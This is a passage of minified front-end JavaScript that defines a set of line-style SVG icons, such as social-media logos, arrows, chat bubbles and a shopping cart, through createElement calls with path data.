24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M16.5 8H14a2 2 0 0 0-2 2v11m-2-7h5"})),google_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"m21.882 10.459-.103-.428h-9.485v3.938h5.667c-.588 2.741-3.318 4.184-5.549 4.184-1.623 0-3.333-.67-4.465-1.746a6.25 6.25 0 0 1-1.4-2.021 6.152 6.152 0 0 1-.502-2.393c0-1.66.76-3.318 1.865-4.41 1.106-1.091 2.776-1.702 4.437-1.702 1.902 0 3.264.99 3.774 1.442l2.853-2.784C18.137 3.818 15.838 2 12.254 2 9.49 2 6.84 3.039 4.903 4.933 2.99 6.8 2 9.497 2 12s.937 5.066 2.79 6.946C6.77 20.952 9.574 22 12.46 22c2.627 0 5.117-1.01 6.892-2.842 1.745-1.803 2.647-4.3 2.647-6.915 0-1.101-.113-1.755-.118-1.784Z"})),growth_increase_up_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m20.2 7.8-7.7 7.7-4-4-5.7 5.7"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 7h6v6"})),hamicon_5_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 13a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2ZM5 6a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2ZM5 20a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm7 0a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"})),hamicon_6_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 13a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm0-7a1 1 0 1 0 0-2 1 1 0 0 0 0 2Zm0 14a1 1 0 1 0 0-2 1 1 0 0 0 0 2Z"})),happy_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 8v1.5m7-1.5v1.5M12 18a5 5 0 0 0 5-5H7a5 5 0 0 0 5 5Z"})),heart_love_wishlist_favourite_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m4.098 13.848 7.52 7.519a.542.542 0 0 0 .765 0l7.52-7.52a5.678 5.678 0 0 0 0-8.028 5.047 5.047 0 0 0-7.138 0l-.711.71a.076.076 0 0 1-.107 0l-.711-.71a5.047 5.047 0 0 0-7.138 0 5.678 5.678 0 0 0 0 8.029Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16.334 7.48c.553 0 1.107.21 1.53.633.547.548.78 1.292.695 2.006"})),hemicon_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h11.5M4 19h16"})),hemicon_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h16M4 19h16"})),hemicon_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M4 5h16M4 12h11.5M4 19h8"})),hidden_hide_invisible_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17.862 5.999c-1.61-1.148-3.576-2-5.86-2-7 0-11 8-11 8s1.764 3.529 5 5.899m3 1.596a9.213 9.213 0 0 0 3 .505c7 0 11-8 11-8s-.867-1.734-2.5-3.587"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14 9.764A3 3 0 0 0 9.764 14m5.21-1.601a3.002 3.002 0 0 1-2.59 2.577M3.6 20.4 20.4 3.6"})),home_house_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"m3.671 9.403 7-6.222a2 2 0 0 1 2.658 0l7 6.222A2 2 0 0 1 21 10.898V19a2 2 0 0 1-2 2h-3.5a1 1 0 0 1-1-1v-5a1 1 0 0 0-1-1h-3a1 1 0 0 0-1 1v5a1 1 0 0 1-1 1H5a2 2 0 0 1-2-2v-8.102a2 2 0 0 1 .671-1.495Z"})),hourglass_timer_time_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 2v4.93a2 2 0 0 0 .89 1.664l4.555 3.036a1 1 0 0 0 1.11 0l4.554-3.036A2 2 0 0 0 18 6.93V2M6 22v-4.93a2 2 0 0 1 .89-1.664l4.555-3.036a1 1 0 0 1 1.11 0l4.554 3.036A2 2 0 0 1 18 17.07V22"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M4 2h16M4 22h16M9.5 19.5h5M11 17h2"})),instagram_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"4",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"2",d:"M17 7h.01"})),laptop_computer_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3.5 6a2 2 0 0 1 2-2h13a2 2 0 0 1 2 2v10h-17V6Zm7 1h3M2 16h20v2a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2v-2Z"})),left_align_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18M3 21h8m-8-6h18M3 9h8"})),left_triangle_angle_arrow_backward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6.067 12.8a1 1 0 0 1 0-1.6l9.333-7A1 1 0 0 1 17 5v14a1 1 0 0 1-1.6.8l-9.333-7Z"})),linkedin_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M7.75 10.25v6"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"2",d:"M7.75 7.75h.01"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M11.25 10.25v6m5 0v-3.5a2.5 2.5 0 0 0-5 0"})),link_chains_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m14.011 17.028-2.514 2.514a4.977 4.977 0 1 1-7.04-7.04L6.973 9.99M9.99 6.973l2.514-2.514a4.978 4.978 0 1 1 7.04 7.04l-2.515 2.513M9.5 14.5l5-5"})),location_gps_map_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"10",r:"3",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 10.205C20 17.385 12 22 12 22s-8-4.615-8-11.795C4 5.674 7.582 2 12 2s8 3.674 8 8.205Z"})),long_arrow_up_top_increase_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 21V3m0 0L6 9m6-6 6 6"})),mail_email_messege_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 6a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v12a2 2 0 0 1-2 2H4a2 2 0 0 1-2-2V6Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m6 8 4.8 3.6a2 2 0 0 0 2.4 0L18 8"})),media_document_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 21h14a2 2 0 0 0 2-2V8.828a2 2 0 0 0-.586-1.414l-3.828-3.828A2 2 0 0 0 15.172 3H5a2 2 0 0 0-2 2v14a2 2 0 0 0 2 2ZM8 9h4m-4 3h8m-8 3h6"})),messege_comment_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 7v15l5-4h13a2 2 0 0 0 2-2V7a2 2 0 0 0-2-2H4a2 2 0 0 0-2 2Zm7 3h4m-4 3h6"})),messege_comment_2_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2ZM9 9h4m-4 3h6"})),messege_comment_3_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2ZM8 11v-1m4 1v-1m4 1v-1"})),messege_comment_4_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M20 4H4a2 2 0 0 0-2 2v9a2 2 0 0 0 2 2h4.5v4l5-4H20a2 2 0 0 0 2-2V6a2 2 0 0 0-2-2Z"})),messege_comment_5_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 12a9 9 0 1 1 9 9H3v-9Zm6-1.5h6m-6 3h6"})),messege_comment_6_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 16a4 4 0 0 1-4 4H2v-6a4 4 0 0 1 4-4"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M6 9a5 5 0 0 1 5-5h6a5 5 0 0 1 5 5v7H11a5 5 0 0 1-5-5V9Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 8.5h4m-4 3h6"})),messege_comment_7_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 20c5.523 0 10-3.806 10-8.5S17.523 3 12 3 2 6.806 2 11.5c0 2.78 1.571 5.25 4 6.8v3.2l3.211-1.835A11.66 11.66 0 0 0 12 20Zm-3-9.5h6m-5 3h4"})),messege_comment_8_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.5 18.703c-4.142 0-7.5-3.292-7.5-7.352C7 7.291 10.358 4 14.5 4c4.142 0 7.5 3.291 7.5 7.351 0 2.405-1.178 4.54-3 5.882V20l-2.408-1.587a7.645 7.645 0 0 1-2.092.29Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.352 5.55A7.131 7.131 0 0 0 8.5 5.5C4.91 5.5 2 8.174 2 11.473c0 1.954 1.021 3.69 2.6 4.779V18.5l2.087-1.29a7.04 7.04 0 0 0 2.813.166c.169-.024.336-.054.5-.09"})),messenger_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 22c5.523 0 10-4.477 10-10S17.523 2 12 2 2 6.477 2 12c0 1.834.494 3.553 1.355 5.03L2 22l4.818-1.445A9.954 9.954 0 0 0 12 22Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m7 13.75 3-3 3.5 3 3.5-3.5"})),microsoft_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Zm9-2v18m-9-9h18"})),middle_align_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18M8 21h8M3 15h18M8 9h8"})),mobile_smartphone_phone_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17 2H7a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h10a2 2 0 0 0 2-2V4a2 2 0 0 0-2-2Zm-6.5 3h3"})),pause_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h2.5a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Zm11.5 0a2 2 0 0 1 2-2H19a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2h-2.5a2 2 0 0 1-2-2V5Z"})),pinterest_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 11 8 21m1.818-4.5A5 5 0 1 0 7.416 14"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"})),play_media_video_circle_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 2c5.522 0 10 4.477 10 10s-4.478 10-10 10C6.477 22 2 17.523 2 12S6.477 2 12 2Z",clipRule:"evenodd"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m16 12-6-4v8l6-4Z"})),price_tag_label_category_sale_discount_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12.328 2.5H20.5a1 1 0 0 1 1 1v8.172a2 2 0 0 1-.586 1.414l-8 8a2 2 0 0 1-2.829 0l-7.171-7.172a2 2 0 0 1 0-2.828l8-8a2 2 0 0 1 1.414-.586Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M18 7.5a1.5 1.5 0 1 1-3 0 1.5 1.5 0 0 1 3 0Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"m8 13 3 3"})),price_tag_offer_sale_coupon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15.5 5.5h-3.672a2 2 0 0 0-1.414.586l-6.5 6.5a2 2 0 0 0 0 2.828l6.171 6.172a2 2 0 0 0 2.829 0l6.5-6.5A2 2 0 0 0 20 13.672V6.5a1 1 0 0 0-1-1h-.5M8 14.5l3 3m-.5-4.5 2 2"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M16 9c4.5-2.5 1.655-7.99-2.766-6.817-2.752.73-5.916 1.27-9.234 0"})),reddit_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeWidth:"1.5",d:"M12 9c-4.97 0-9 2.91-9 6.5S7.03 22 12 22s9-2.91 9-6.5S16.97 9 12 9Zm0 0V6a2 2 0 0 1 2-2h3m3.506 9.37a2.25 2.25 0 1 0-2.856-2.93M17 4a2 2 0 1 0 4 0 2 2 0 0 0-4 0ZM3.494 13.37a2.25 2.25 0 1 1 2.856-2.93"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M8.5 16.75c1.5 1.5 5.5 1.5 7 0M15 13h.01M9 13h.01"})),refresh_reset_cycle_loop_infinity_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M21 12a9 9 0 0 1-17 4.127M3 12a9 9 0 0 1 17-4.127M20 3v5h-5M4 21v-5h5"})),restriction_no_stop_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M5 19 19 5"})),right_align_1_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeWidth:"1.5",d:"M3 3h18m-8 18h8M3 15h18m-8-6h8"})),right_triangle_angle_play_arrow_forward_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M17.933 12.8a1 1 0 0 0 0-1.6L8.6 4.2A1 1 0 0 0 7 5v14a1 1 0 0 0 1.6.8l9.333-7Z"})),search_magnify_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M11 19a8 8 0 1 0 0-16 8 8 0 0 0 0 16Zm10 2-4.35-4.35"})),settings_tool_function_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5",d:"M9.55 2.778A1 1 0 0 1 10.523 2h2.953a1 1 0 0 1 .975.778l.355 1.562a2 2 0 0 0 2.538 1.468l1.627-.5a1 1 0 0 1 1.155.447l1.456 2.464a1 1 0 0 1-.193 1.253l-1.16 1.04a2 2 0 0 0 0 2.978l1.16 1.038a1 1 0 0 1 .193 1.254l-1.456 2.464a1 1 0 0 1-1.155.447l-1.627-.5a2 2 0 0 0-2.538 1.468l-.355 1.56a1 1 0 0 1-.976.779h-2.952a1 1 0 0 1-.975-.778l-.355-1.562a2 2 0 0 0-2.538-1.468l-1.628.5a1 1 0 0 1-1.154-.446l-1.456-2.464a1 1 0 0 1 .193-1.254l1.16-1.038a2 2 0 0 0 0-2.979L2.61 9.472a1 1 0 0 1-.194-1.253l1.456-2.464a1 1 0 0 1 1.155-.447l1.628.5A2 2 0 0 0 9.194 4.34l.355-1.562Z"}),(0,a.createElement)("circle",{cx:"12",cy:"12",r:"3",stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.5"})),share_social_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.968 10.591a3.15 3.15 0 1 0 0 2.818m0-2.818c.212.424.332.902.332 1.409s-.12.985-.332 1.409m0-2.818 7.013-3.507M8.968 13.41l7.013 3.507m0-9.832a2.7 2.7 0 1 0 4.637-2.769 2.7 2.7 0 0 0-4.637 2.77Zm0 9.832a2.7 2.7 0 1 0 4.637 2.769 2.7 2.7 0 0 0-4.637-2.77Z"})),shopping_cart_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M2 3h2.128a1 1 0 0 1 .991.863l1.762 12.774a1 1 0 0 0 .99.863H18.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M10.5 19.25a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0Zm9.75 0a1.75 1.75 0 1 1-3.5 0 1.75 1.75 0 0 1 3.5 0ZM5.5 5h15.304a1 1 0 0 1 .984 1.177l-1.152 6.403a1 1 0 0 1-.898.82L7 14.5"})),skype_logo_icon_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M12 3c-.415 0-.823.028-1.223.082a5.5 5.5 0 0 0-7.695 7.695 9 9 0 0 0 10.14 10.14 5.5 5.5 0 0 0 7.695-7.695A9 9 0 0 0 12 3Z"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M15 10c0-1-1-2-3-2s-3 1-3 2c0 2.5 6 1.5 6 4 0 1-1 2-3 2s-3-1-3-2"})),smile_emoji_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("circle",{cx:"12",cy:"12",r:"10",stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5"}),(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M8.5 8.5V10m7-1.5V10m-8.271 4a5.002 5.002 0 0 0 9.542 0"})),social_community_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M14.632 5.032a8.446 8.446 0 0 1 5.79 8.024 8.5 8.5 0 0 1-.18 1.74M9.368 5.031a8.446 8.446 0 0 0-5.79 8.024c.001.596.063 1.178.18 1.74m13.915 4.5c.458.387 1.05.62 1.695.62A2.635 2.635 0 0 0 22 17.279a2.635 2.635 0 0 0-2.632-2.64 2.635 2.635 0 0 0-2.631 2.64c0 .81.364 1.534.936 2.018Zm0 0A8.378 8.378 0 0 1 12 21.5a8.378 8.378 0 0 1-5.673-2.204m0 0a2.636 2.636 0 0 0 .936-2.018 2.635 2.635 0 0 0-2.631-2.64A2.635 2.635 0 0 0 2 17.279a2.635 2.635 0 0 0 2.632 2.639c.645 0 1.237-.234 1.695-.62ZM14.632 5.14A2.635 2.635 0 0 1 12 7.778a2.635 2.635 0 0 1-2.632-2.64A2.635 2.635 0 0 1 12 2.5a2.635 2.635 0 0 1 2.632 2.639Z"})),square_rounded_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinecap:"round",strokeLinejoin:"round",strokeWidth:"1.5",d:"M3 5a2 2 0 0 1 2-2h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5Z"})),star_rating_line:(0,a.createElement)("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"none",viewBox:"0 0 24 24"},(0,a.createElement)("path",{stroke:"currentColor",strokeLinejoin:"round",strokeWidth:"1.579",d:"M11.016 3.125c.387-.833 1.58-.833 1.968 0l2.136 4.602c.158.34.482.573.856.617l5.067.597c.918.108 1.286 1.233.608 1.856l-3.748 3.444a1.07 1.07 0 0 0-.326.998l.994 